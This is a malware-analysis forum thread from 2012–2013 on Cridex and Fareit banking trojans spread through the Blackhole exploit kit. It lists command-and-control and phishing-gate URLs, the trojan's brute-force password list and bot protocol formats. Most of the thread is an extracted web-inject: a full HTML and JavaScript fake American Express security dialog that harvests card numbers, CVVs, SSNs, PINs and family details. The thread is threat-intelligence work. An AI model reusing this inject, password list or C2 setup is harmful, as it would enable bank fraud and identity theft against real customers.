A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17211  by unixfreaxjp
 Sun Dec 16, 2012 7:46 am
To EP_X0FF, nice crypted PE cracks! Will you please blog the details of reversing it?
At the time I saw the crypted packed I just skipped it to save times... (got only weekend for this)
I thought only @Xylit0l in this planet that can reverse it ;P < Steve you're so busy these days is it?
PS: I went straight to play with this stuff and post it in MalwareMustDie blog mentioning kernelmode & you guys!
#MalwareMustDie! You guys rocks!!!
 #17214  by EP_X0FF
 Sun Dec 16, 2012 4:11 pm
unixfreaxjp wrote:To EP_X0FF, nice crypted PE cracks! Will you please blog the details of reversing it?
Sorry no. Never understood all this descriptions of decryption/unpacking in the AV articles. It is very boring process if manual.

Specifically to Fareit - set breaks on memory alloc, trace a little when it will be called with ERW protection. Dump this region when it filled with decrypted payload. Cut off garbage and rebuild resulting PE. Done.
 #17351  by unixfreaxjp
 Sat Dec 22, 2012 7:48 pm
The set of Trojan Parfeit Infection Distributed via Cridex using BHEK 2.1 Plugindetect 0.7.9

Summary: Cridex Callback:
  • h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    *) With all Proxy's Port/Server: 8080 / nginx/1.0.10
    *) Downloading Parfeit...
Parfeit VT: Parfeit Callback URLs:
  • h00p://132.248.49.112:8080/asp/intro.php
    h00p://113.130.65.77:8080/asp/intro.php
    h00p://203.113.98.131:8080/asp/intro.php
    h00p://110.164.58.250:8080/asp/intro.php
    h00p://200.108.18.158:8080/asp/intro.php
    h00p://207.182.144.115:8080/asp/intro.php
    h00p://148.208.216.70:8080/asp/intro.php
    h00p://203.172.252.26:8080/asp/intro.php
    h00p://202.6.120.103:8080/asp/intro.php
    h00p://203.146.208.180:8080/asp/intro.php
    h00p://207.126.57.208:8080/asp/intro.php
    h00p://203.80.16.81:8080/asp/intro.php
    h00p://202.180.221.186:8080/asp/intro.php
Credential CNC Server Info:
  • // Credentials sent CnC panel
    var adminPanelLocation ='h00p://62.76.177.51/if_Career/';
    //Data Modify Process:
    h00p://62.76.177.123/mx/2B/in/cp.php?h=8
    // Phishing Credentials urls
    h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
    h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
    h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
Brute Password in Parfeit bins:
Code: Select all
phpbb      john316      pass        slayer    
qwerty     richard      aaaaaa      wisdom    
jesus      blink182     amanda      praise    
abc123     peaches      nothing     zxcvbnm   
letmein    cool         ginger      samuel    
test       flower       mother      mike      
love       scooter      snoopy      dallas    
password1  banana       jessica     green     
hello      james        welcome     testtest  
monkey     asdfasdf     pokemon     maverick  
dragon     victory      iloveyou1   onelove   
trustno1   london       mustang     david     
iloveyou   123qwe       helpme      mylove    
shadow     startrek     justin      church    
christ     george       jasmine     friend    
sunshine   winner       orange      god       
master     maggie       testing     destiny   
computer   trinity      apple       none      
princess   online       michelle    microsoft 
tigger     123abc       peace       bubbles   
football   chicken      secret      cocacola  
angel      junior       grace       jordan23  
jesus1     chris        william     ilovegod  
whatever   passw0rd     iloveyou2   football1 
freedom    austin       nicole      loving    
killer     sparky       muffin      nathan    
asdf       admin        gateway     emmanuel  
soccer     merlin       fuckyou1    scooby    
superman   google       asshole     fuckoff   
michael    friends      hahaha      sammy     
cheese     hope         poop        maxwell   
internet   shalom       blessing    jason     
joshua     nintendo     blahblah    john      
fuckyou    looking      myspace1    1q2w3e4r  
blessed    harley       matthew     baby      
baseball   smokey       canada      red123    
starwars   joseph       silver      blabla    
purple     lucky        robert      prince    
jordan     digital      forever     qwert     
faith      thunder      asdfgh      chelsea   
summer     spirit       rachel      angel1    
ashley     bandit       rainbow     hardcore  
buster     enter        guitar      dexter    
heaven     anthony      peanut      saved     
pepper     corvette     batman      hallo     
hunter     hockey       cookie      jasper    
lovely     power        bailey      danielle  
andrew     benjamin     soccer1     kitten    
thomas     iloveyou!    mickey      cassie    
angels     1q2w3e       biteme      stella    
charlie    viper        hello1      prayer    
daniel     genesis      eminem      hotdog    
jennifer   knight       dakota      windows   
single     qwerty1      samantha    mustdie   
hannah     creative     compaq      gates     
qazwsx     foobar       diamond     billgates 
happy      adidas       taylor      ghbdtn    
matrix     rotimi       forum       gfhjkm   hgTYDOMium
Additionals:
 #17740  by unixfreaxjp
 Thu Jan 17, 2013 6:35 pm
The latest set of Trojan Fareit Infection Distributed via Trojan Cridex using BHEK 2.1 Plugindetect 0.7.9

Summary:
Spam URL: h00p://kompot.designcon.tmweb.ru/upload.htm (176.57.216.3)
Or this: h00p://www.piastraollare.com/upload.htm
Landing URL: h00p://dozakialko.ru:8080/forum/links/column.php
(212.112.207.15, 89.111.176.125, 91.224.135.20)
BHEK PluginDetect: http://pastebin.com/50Usb5TE
BHEK Payload Crack Guide/MyNote: http://malwaremustdie.blogspot.jp/p/81.html
↑ different domain, same actors
Cridex Payload:
Code: Select all
h00p://dozakialko.ru:8080/forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t
Cridex VT: https://www.virustotal.com/file/ceff348 ... /analysis/
Fareit VT: https://www.virustotal.com/file/cdbc248 ... /analysis/

Cridex Callback
Method: HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Image
To:
Code: Select all
h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080
Server's stamps:
Code: Select all
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:17:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
User-Agent Used by Cridex:
Code: Select all
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
Textual (Botnet?) Commands Sent Via Post to motherships:
Code: Select all
Connection
modify
pattern
replacement
httpinject
conditions
actions
redirect
process
MSG/Protocol Formats:
Code: Select all
// The sent time, user-agent via HTTP
<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>
 
// Current time sent with url and data
<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>
 
// FTP data...
<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>
 
// Mail POP3 data..
<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>
 
// Command lines...
<cmd id="%u">%u</cmd>
 
// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>
 
// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>
 
// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>
 
// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>
 
// Hashed message contains PC privacy info...
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>
Crypto Method:
Code: Select all
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
Fareit Config files snipped:
Image
Image
Code: Select all
"cash & wires accounts"
 
 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
 <httpshots><url type="deny">\.(css|js)($|\?)</url>
 <url contentType="^text/(html|plain)">\.com/k1/</url>
 <url contentType="^text/(html|plain)">/ach/</url>
 <url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
 <url contentType="^text/(html|plain)">/bb/logon/</url>
 <url contentType="^text/(html|plain)">chase\.com</url>
 <url contentType="^text/(html|plain)">/cashman/</url>
 <url contentType="^text/(html|plain)">/cashplus/</url>
    :
"SNS Accounts.."
 
 <formgrabber>
   <url type="deny">\.(swf)($|\?)</url>
   <url type="deny">/isapi/ocget.dll</url>
   <url type="allow">^https?://aol・com/.*/login/</url>
   <url type="allow">^https?://accounts.google・com/ServiceLogin</url>
   <url type="allow">^https?://login.yahoo・com/</url>
   <url type="allow">^https?://login.live・com/</url>
   <url type="deny">^https?://(\w+\.)?aol・com</url>
   <url type="deny">^https?://(\w+\.)?facebook・com/</url> 
       :
ORIGINAL CODE:
 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8"><httpshots><url type="deny">\.(css|js)($|\?)</url><url contentType="^text/(html|plain)">\.com/k1/</url><url contentType="^text/(html|plain)">/ach/</url><url contentType="^text/(html|plain)">/authentication/zbf/k/</url><url contentType="^text/(html|plain)">/bb/logon/</url><url 
    : (snipped)
<div id="namefr" style="display:none;" >
 <iframe width="50" height="50" id="myfx"  name="myfx"></iframe>
 </div>
 <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
 <style type="text/css">
 .ui-dialog-titlebar
 {
   background: white
 }
 .text1a
 {
   font-family: Arial;
   font-size: 10px;
 }
 .sunclass
 {
   border-bottom-color: #cccccc;
   border-bottom-style: solid;
   border-bottom-width: 1px;
   border-collapse: collapse;
   background-color: #f5f6f1;
   color: #333333;
   margin-right:10px;
   margin-left:10px;
   text-align: center;
 }
 </style>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
 <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
 <div id="msg"   style=" display:none; height:60px;" class=sunclass>
 <div id="box"    class=sunclass  style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
 <font id="err" style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
 </div>
 </div>
 <div id="dialog"   style=" display:none; height:180px; width:350px;padding:0; margin0;">
 <div id="txt1"  class=sunclass  style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
 </div>
 <div id="txt2"   class=sunclass>
 <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
 </div>
 <form action="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif" id="test" method="post" target="myfx" >
 <!--CC-->
 <div id="full_cc"  class=sunclass style="height:30px ;text-align: left;">
 <table>
 <tr>
 <td>
 <div id="div_cc_text" style="padding:1px; padding-top:3px; width:72px ; height:25px;text-align:left;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">Card number:</font>
 </div>
 </td>
 <td>
 <div id="div_cc" style ="padding:1px;">
 <input type="text" class="amountfield"  id="cc1" style="text-align:right;width:34px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1"  onkeyup="tabNext1CC(this);"   maxlength=4 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
 <input type="text" class="amountfield"  id="cc2"style="text-align:right; width:42px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2"   onkeyup="tabNext2CC(this);"  maxlength=6 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
 <input type="text" class="amountfield"  id="cc3" style="text-align:right;width:38px; height:12px;  font-weight:700;font-family: Arial;font-size: 10px;" name="cc3"   maxlength=5 >
 </div>
 </td>
 </tr>
 </table>
 </div>
 <!--EXP-->
 <div id="fulll_exp"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font>
 </div>
 </td>
 <td><div id="div_exp" style ="padding:1px;">
 <input type="text"  class="amountfield"   id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm"    maxlength=2 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
 <input type="text"  class="amountfield"  id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--CVV-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;"><input type="text"   id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv"    maxlength=4 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/312/ac62dbbce67681a33d23490607f59cf6')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
 </tr>
 </table>
 </div>
 <!--3 digit code-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_3digitcode" style="padding:1px; padding-top:7px; width:172px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">3-Digit Code on the back of card:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;"><input type="text"   id="3digitcode" style="text-align:right;width:33px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="3digitcode" method="post"   maxlength=3 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/273/58be12e2c069fcc7b20ebb2a11921f98')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
 </tr>
 </table>
 </div>
 <!--SSN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"   id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1"     maxlength=3 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text"  class="amountfield"   id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--Personal security PIN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Personal security PIN:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"   id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ps_pin"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--MMN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"    id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn"   >
 </div></td>
 </tr>
 </table>
 </div>
 <!--POB-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Place of birth:</font></td></div>
 <td><div id="div_pob" style =" padding:1px;">
 <input type="text" class="amountfield"    id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="pob"   >
 </div></td>
 </tr>
 </table>
 </div>
 <!--DOB-->
 <div id="txt2"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text"  class="amountfield"  id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--MDOB-->
 <div id="txt2"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text"  class="amountfield"  id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <div id="txt2" class=sunclass style="height: 20px; padding:3px ;padding-right:15px;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right"><input type="image" onclick="return formmySubmit();"   align="right" src="/myca/shared/summary/asr/images/lnf/btn_continue.gif"  value="Verify"  title="Continue"/></div></font>
 </div>
 </form>
 </div>
 <script type="text/javascript">
 function tabNext1CC(elem) {
   if(elem.value.length == 4) {
     document.getElementById('cc2').focus();
   }
 }
 function tabNext2CC(elem) {
   if(elem.value.length == 6) {
     document.getElementById('cc3').focus();
   }
 }
 function formmySubmit() {
   $("#msg").css("background", "#f5f6f1");
   if (checkCC()) {
     $("#div_cc_text").css("color", "black");
     if (checkExp()) {
       $("#div_exp").css("color", "black");
       if (checkCVV()) {
         $("#div_cvv").css("color", "black");
         if (check3DigitCode()) {
           $("#div_3digitcode").css("color", "black");
           if (SSN_check() == true) {
             $("#div_ssn").css("color", "black");
             if (PS_PIN_check() == true) {
               $("#div_ps_pin").css("color", "black");
               if (POB_check() == true) {
                 $("#div_pob").css("color", "black");
                 if (checkDob() == true) {
                   $("#div_dob").css("color", "black");
                   $("#div_mdob").css("color", "black");
                   $.cookie("trusted_rapport", "1", {
                     expires: 10,
                     path: "/",
                     domain: ".americanexpress.com"
                   });
                   $("#dialog").dialog("close");
                   return true
                 } else {
                   $("#div_dob").css("color", "red");
                   $("#div_mdob").css("color", "red");
                   doError("Date of birth")
                 }
               } else {
                 $("#div_pob").css("color", "red");
                 doError("place of birth")
               }
             } else {
               $("#div_ps_pin").css("color", "red");
               doError("personal security PIN")
             }
           } else {
             $("#div_ssn").css("color", "red");
             doError("social security number")
           }
         } else {
           $("#div_3digitcode").css("color", "red");
           doError("3-digit code")
         }
       } else {
         $("#div_cvv").css("color", "red");
         doError("cvv code")
       }
     } else {
       $("#div_exp").css("color", "red");
       doError("expiration date")
     }
   } else {
     $("#div_cc_text").css("color", "red");
     doError("card number")
   }
 }
 function out() {
   document.body.removeChild(img)
 }
 function move(a) {
   a = a || window.event;
   if (a.pageX == null && a.clientX != null) {
     var b = document.documentElement;
     var c = document.body;
     a.pageX = a.clientX + (b && b.scrollLeft || c && c.scrollLeft || 0) - (b.clientLeft || 0);
     a.pageY = a.clientY + (b && b.scrollTop || c && c.scrollTop || 0) - (b.clientTop || 0)
   }
   img.style.left = a.pageX + 15 + "px";
   img.style.top = a.pageY + 15 + "px"
 }
 function over(a) {
   img = document.createElement("div");
   document.body.appendChild(img);
   img.innerHTML = "<img src=" + a + " />";
   img.style.zIndex = "111111111111";
   img.style.position = "absolute";
   img.style.background = "#FFFFFF";
   img.style.border = "solid 1px #346fdc";
   img.style.padding = "4px";
   move();
 }
 function SSN_check() {
   var a = $("#ssn_1").val();
   var b = $("#ssn_2").val();
   var c = $("#ssn_3").val();
   var d = a.length + b.length + c.length;
   if (d == 9)
   if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
   return true;
   return false
 }
 function PS_PIN_check() {
   var a = $("#ps_pin").val();
   var d = a.length;
   if (d == 4)
   //if (isNaN(a) == false) // uncomment if pin is digital only
   return true;
   return false
 }
 function POB_check() {
   var a = $("#pob").val();
   var d = a.length;
   if (d > 0) {
     return true;
   }
   else {
     return true;
   }
 }
 function check3DigitCode() {
   var a = $("#3digitcode").val();
   var b = a.length;
   if (isNaN(a) == false)
   if (b == 3)
   return true;
   return false
 }
 function checkCVV() {
   var a = $("#cvv").val();
   var b = a.length;
   if (isNaN(a) == false)
   if (b == 4)
   return true;
   return false
 }
 function checkExp() {
   var a = $("#exp_mm").val();
   var b = $("#exp_yy").val();
   var c = a.length + b.length;
   if (c > 5)
   if (a > 0 && a < 13)
   if (b > 2009 && b < 2030)
   return true;
   return false
 }
 function checkCC() {
   var a = $("#cc1").val();
   var b = $("#cc2").val();
   var c = $("#cc3").val();
   if (check_cc(a+b+c) && a.charAt(0) == "3")
   return true;
   return false
 }
 function checkDob() {
   var a = $("#dob_mm").val();
   var b = $("#dob_dd").val();
   var c = $("#dob_yy").val();
   var d = $("#mdob_mm").val();
   var e = $("#mdob_dd").val();
   var f = $("#mdob_yy").val();
   var g = a.length + b.length + c.length;
   var h = d.length + e.length + f.length;
   if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
   if (g > 6)
   if (c < 1995 && c > 1900)
   if (a > 0 && a < 13 && b > 0 && b < 32)
   if ((isNaN(d) || isNaN(e) || isNaN(f)) == false)
   if (h > 6)
   if (d > 0 && d < 13 && e > 0 && e < 32)
   if (f + 12 < c)
   return true;
   return false
 }
 function doError(a) {
   $("#ername").text(a);
   $("#ername1").text(a);
   $("#msg").dialog({
     closeOnEscape: false,
     resizable: false,
     modal: true,
     width: 350,
     modal: true,
     zIndex: 99999
   })
 }
 function formClose() {
   $("#msg").dialog("close");
   return true
 }
 function check_cc(cardnumber) {
   var cardNo = cardnumber.replace(/[^0-9]/g, "");
   if (cardNo.length < 15 || cardNo.length > 16) {
     return false;
   }
   var checksum = 0;
   var j = 1;
   var calc;
   for (i = cardNo.length - 1; i >= 0; i--) {
     calc = Number(cardNo.charAt(i)) * j;
     if (calc > 9) {
       checksum = checksum + 1;
       calc = calc - 10;
     }
     checksum = checksum + calc;
     if (j == 1) {
       j = 2;
     } else {
       j = 1;
     }
   }
   if (checksum % 10 != 0) {
     return false;
   }
   return true;
 }
 jQuery.cookie = function(a, b, c) {
   if (typeof b != "undefined") {
   c = c || {};
     if (b === null) {
       b = "";
       c.expires = -1
     }
     var d = "";
     if (c.expires && (typeof c.expires == "number" || c.expires.toUTCString)) {
       var e;
       if (typeof c.expires == "number") {
         e = new Date;
         e.setTime(e.getTime() + c.expires * 24 * 60 * 60 * 1e3)
       } else
       e = c.expires;
       d = "; expires=" + e.toUTCString()
     }
     var f = c.path ? "; path=" + c.path: "";
     var g = c.domain ? "; domain=" + c.domain: "";
     var h = c.secure ? "; secure": "";
     document.cookie = [a, "=", encodeURIComponent(b), d, f, g, h].join("")
   } else {
     var i = null;
     if (document.cookie && document.cookie != "") {
       var j = document.cookie.split(";");
       for (var k = 0; k < j.length; k++) {
         var l = jQuery.trim(j[k]);
         if (l.substring(0, a.length + 1) == a + "=") {
           i = decodeURIComponent(l.substring(a.length + 1));
           break
         }
       }
     }
     return i
   }
 };
 if ($.cookie("trusted_rapport"));
 else
 $(document).ready(function() {
   $('.comingSoonPop').remove();
   $('.comingSoonTransLayer').remove();
   $("#dialog").dialog({
     closeOnEscape: false,
     resizable: false,
     modal: true,
     width: 350,
     modal: true,
     zIndex: 99998
   });
   $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif"></div>')
 })
 </script>
 ]]></replacement></modify></actions></httpinject><httpinject><conditions><url type="deny">\.(css|js)($|\?)</url><url type="allow" contentType="^text/(html|plain)"><![CDATA[^https://.*?\.americanexpress\.com]]></url></conditions><actions><modify><pattern><![CDATA[</html>(.*?)]]></pattern><replacement><![CDATA[
 <script type="text/javascript">
 // remove saved IDs
 Delete_Cookie("profile", "/", ".americanexpress.com");
 var UsernameField = document.getElementById('Username');
 if(UsernameField) {
   UsernameField.value = '';
   UsernameField.blur();     
Fareit Mothership Sent Method:
Code: Select all
"Redirecting data to POST.."
   <redirect><pattern>jQuatro.js</pattern>
   <process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
   </redirect></redirects>
    
"BOTNET Connection..."
   <bconnect>85.143.166.72:443</bconnect>
   <httpinjects><httpinject><conditions>
Fareit Callbacks HOSTS:
Image
Code: Select all
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
